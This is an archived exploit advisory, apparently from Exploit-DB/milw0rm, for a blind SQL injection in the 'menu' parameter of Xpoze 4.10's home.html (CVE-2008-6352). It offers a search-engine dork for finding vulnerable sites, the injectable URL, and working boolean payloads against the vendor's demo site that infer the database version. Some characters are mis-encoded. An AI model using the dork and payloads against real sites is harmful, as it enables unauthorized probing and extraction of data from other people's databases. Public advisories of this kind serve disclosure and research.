Xpoze 4.10 home.html menu Blind SQL Injection Vulnerability

2008-12-12T00:00:00
ID EDB-ID:7432
Type exploitdb
Reporter XaDoS
Modified 2008-12-12T00:00:00

Description

Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability. CVE-2008-6352. Webapps exploit for php platform

                                        
                                            [■]  Xpoze Pro  (home menù) <= Blind $ql Injection

 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: http://www.xpoze.org/

>---------------------------------------<
 
 
[â– ] ExPL0iT:
 
Dork: " Powered by Xpoze "

|: http://www.example.com/home.html?menu=[$qL] 


[■] D£M0: 
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO°°]
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] 
 

 
[â– ] Th4nKs::
 
\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )

# milw0rm.com [2008-12-12]